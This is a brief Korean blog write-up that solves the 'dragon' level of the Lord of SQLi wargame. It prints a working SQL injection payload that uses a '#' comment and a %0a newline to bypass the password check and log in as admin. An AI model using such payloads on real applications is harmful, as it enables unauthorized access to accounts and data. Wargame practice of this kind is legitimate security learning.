반응형
문제
https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php
https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php
los.rubiya.kr
문제풀이
id=guest’# 기본 쿼리문으로 입력되는 pw 파라미터는 주석 처리된다.
개행문자(%0a)를 이용해 입력되는 값이 주석처리에 의해 무효화되지 않게 해야 한다.
select id from prob_dragon where id='guest'# and pw=''%0a and pw='' || id='admin'
반응형
'write-up(web) > los' 카테고리의 다른 글
| [LOS] iron_golem (0) | 2023.01.24 |
|---|---|
| [LOS] xavis (0) | 2023.01.23 |
| [LOS] nightmare (0) | 2023.01.22 |
| [LOS] zombie_assassin (0) | 2023.01.22 |
| [LOS] succubus (0) | 2023.01.22 |